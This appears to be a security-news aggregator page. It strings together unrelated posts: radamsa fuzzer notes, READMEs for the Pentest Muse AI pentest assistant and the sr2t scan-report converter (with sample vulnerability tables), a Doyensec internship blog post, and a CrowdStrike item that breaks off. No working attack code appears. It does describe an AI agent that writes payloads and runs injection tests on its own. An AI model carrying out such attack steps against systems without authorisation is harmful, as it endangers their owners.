We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.

Thanks

The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.

  • Darkkey
  • Branden Archer

Troubleshooting

Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.

You can also drop by at #radamsa on Freenode if you have questions or feedback.

Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.

Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.

FAQ

Q: If I find a bug with radamsa, do I have to mention the tool?
A: No.

Q: Will you make a graphical version of radamsa?

A: No. The intention is to keep it simple and scriptable for use in automated regression tests and continuous testing.

Q: I can't install! I don't have root access on the machine!
A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.

Q: Radamsa takes several GB of memory to compile!1
A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.

Q: Radamsa does not compile using the instructions in this page!
A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email ([email protected]) or IRC (#radamsa on freenode).

Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.
A: Cool. Let me know about it ([email protected]) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.

Q: Can I get support for using radamsa?
A: You can send email to [email protected] or check if some of us happen to be hanging around at #radamsa on freenode.

Q: Can I use radamsa on Windows?
A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.

Q: How can I install radamsa?
A: Grab a binary from downloads and run it, or $ make && sudo make install.

Q: How can I uninstall radamsa?
A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.

Q: Why are many outputs generated by Radamsa equal?
A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.

Q: There are lots of command line options. Which should I use for best results?
A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.

Q: How can I make radamsa faster?
A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.

Q: What's with the funny name?
A: It's from a scene in a Finnish children's story. You've probably never heard about it.

Q: Is this the last question?
A: Yes.

Warnings

Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or antivirus scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.

Not safe when used as prescribed.

This product may contain faint traces of parenthesis.



Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals


Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


Pentest Muse Web App

In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

Disclaimer

This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Requirements

  • Python 3.12 or later
  • Necessary Python packages as listed in requirements.txt

Setup

Standard Setup

  1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse

  1. Install the required packages:

pip install -r requirements.txt

Alternative Setup (Package Installation)

Install Pentest Muse as a Python Package:

pip install .

Running the Application

Chat Mode (Default)

In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

python run_app.py

or

pmuse

Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program with agent model, you can use:

python run_app.py agent

or

pmuse agent

Selection of Language Models

Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.

OpenAI API keys

Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument --openai-api-key=[your openai api key] when starting the program.

Contact

For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at [email protected] or join our discord. Your input is invaluable in helping us improve and evolve.



Sr2T - Converts Scanning Reports To A Tabular Format


Scanning reports to tabular (sr2t)

This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:

  1. Nmap (XML);
  2. Nessus (XML);
  3. Nikto (XML);
  4. Dirble (XML);
  5. Testssl (JSON);
  6. Fortify (FPR).

Rationale

This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.

Dependencies

  1. argparse (dev-python/argparse);
  2. prettytable (dev-python/prettytable);
  3. python (dev-lang/python);
  4. xlsxwriter (dev-python/xlsxwriter).

Install

Using Pip:

pip install --user sr2t

Usage

You can use sr2t in two ways:

  • When installed as package, call the installed script: sr2t --help.
  • When Git cloned, call the package directly from the root of the Git repository: python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]

Converting scanning reports to a tabular format

optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to ouput a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).

specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.

Example

A few examples

Nessus

To produce an XLSX format:

$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |
| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |
| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |
| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |
| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |
| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |
| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |
| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+

Or to output a CSV file:

$ sr2t --nessus example/nessus.nessus -oC example
$ cat example_nessus.csv
host,port,plugin id,plugin name,severity,annotations
192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,44 5,57608,SMB Signing not required,2,X

Nmap

To produce an XLSX format:

$ sr2t --nmap example/nmap.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+

Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+

Or to output a CSV file:

$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X

Nikto

To produce an XLSX format:

$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx

To produce an text tabular format to stdout:

$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+

Or to output a CSV file:

$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X

Dirble

To produce an XLSX format:

$ sr2t --dirble example/dirble.xml -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+

Or to output a CSV file:

$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X

Testssl

To produce an XLSX format:

$ sr2t --testssl example/testssl.json -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+

Or to output a CSV file:

$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X

Fortify

To produce an XLSX format:

$ sr2t --fortify example/fortify.fpr -oX example.xlsx

To produce an text tabular format to stdout:

$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+

Or to output a CSV file:

$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X

Donate

  • WOW: WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp


Internship Experiences at Doyensec

The following blog post gives a voice to our 2023 interns and their experiences with us.

Aleandro

During my last high school year I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity, via lessons and CTFs competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from south of Italy to Pisa, to study at the university, I joined the fibonhack CTF team. I then also started working as a developer and penetration tester on small projects, both inside the university and outside.

Getting recruited

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I also wanted to try a job in the research field. This was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

  • An interview with the Practice Manager
  • A technical challenge on both web and mobile topics
  • Finally, a technical interview with two different security engineers

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

First weeks

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

San Marino landscape

Research weeks

The main research topic of my internship experience was about developing internal tools. Although this project was not mainly about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

Responsibilities

It is important to note that even though you are the last one who has joined the company and have limited experience, all Doyensec team members treat you like all other employees. You could be in charge of actually talking with the client if you have any issues during an assessment, you will have to write and possibly peer review the reports, you will have to evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers that will guide you through the process (Lorenzo in my case - who I would like to thank for helping me in managing the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing and making your own decisions on how to proceed and of course making errors.

To me this was a mind blowing feeling, I did not expect to be completely part of the team, and that my opinions would have mattered. It was really a good approach, in my opinion. It took me a while to fit entirely in the role, but then it was fun all along the way.

Leonardo

Hi, my name is Leonardo, some of you may better know me as maitai, which is the handle that I’ve been using in the CTF scene from the start of my journey. I encountered cybersecurity during my journey while earning my Bachelor of Science in computer science. From the very first moment I was amazed by it. So I decided to dig a bit more into hacking, starting with the PortSwigger Academy, which literally changed my life.

Getting recruited

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was made aware of the next steps in the interview process. First of all, the technical challenges used during the process were brand new. The Practice Manager told me that Doyensec had entirely renewed the challenges with a brand new platform and new challenges. I was essentially the first candidate to ever use this new platform.

The topics of the challenges were mostly web applications in several different languages, with different bugs to spot, alongside mobile challenges that involved the use of state-of-art technologies. I had 2 hours to complete as many challenges as I could, from a pool of 8. The time constraint was right in my opinion. You have around 15 minutes per challenge, which is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit in order to find as many bugs as possible and eventually to pass onto the next steps of the interview process. It was later explained to me that the review of numerous (but short) code snapshots in a limited time-frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities, to how to patch vulnerable code. It was a 360 degree interview. It also included some live code review. The interview lasted for an hour or so, and in the end Luca said that he will evaluate my performance and he will let me know. The day after, another email arrived. I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted for an hour. At this point, I had completed the whole process. I only needed to wait for their response, which didn’t take too long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

First weeks

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also need to hold some meetings during the day, in order to synchronize on different things that can happen during the penetration test. Communication is a key part of Doyensec, and from great communication comes great bugs.

Research weeks

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open source project. In fact, I was tasked to write some plugins for Google’s web security scanner Tsunami. This is a general purpose network security scanner, with an extensible plugins system for detecting high severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it, that can be used to confirm its existence when scanning. I was assigned to write two plugins which detect weak credentials on the RabbitMQ Management Portal and RStudio server. The plugins are written in Java, and since I’ve done a bit of Java programming during my Bachelor’s degree program I felt quite confident about it.

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

Responsibilities

As Aleandro already explained, interns are given a lot of responsibilities along with a great sense of freedom at Doyensec. I would add just one thing, which is about time management. This is one of the most difficult things for me to do. In a remote company, you don’t have time clocks or similar, so you can choose to work the way that you prefer. Luca told me several times that at Doyensec the output is what is evaluated. This is a big thing for me to deal with since I was used to work a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which for me, is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are so enjoyable.

Conclusions

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

Gift from the retreat

In the end, you should consider applying for the next call for interns, if you:

  • are passionate about application security
  • have already good web security skills
  • have organizational capabilities
  • want scheduling flexibility
  • can manage remote work

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

CrowdStrike Enhances Cloud Detection and Response (CDR) Capabilities to Protect CI/CD Pipeline

The increase in cloud adoption has been met with a corresponding rise in cybersecurity threats. Cloud intrusions escalated by a staggering 75% in 2023, with cloud-conscious cases increasing by 110%. Amid this surge, eCrime adversaries have become the top threat actors targeting the cloud, accounting for 84% of adversary-attributed cloud-conscious intrusions. 

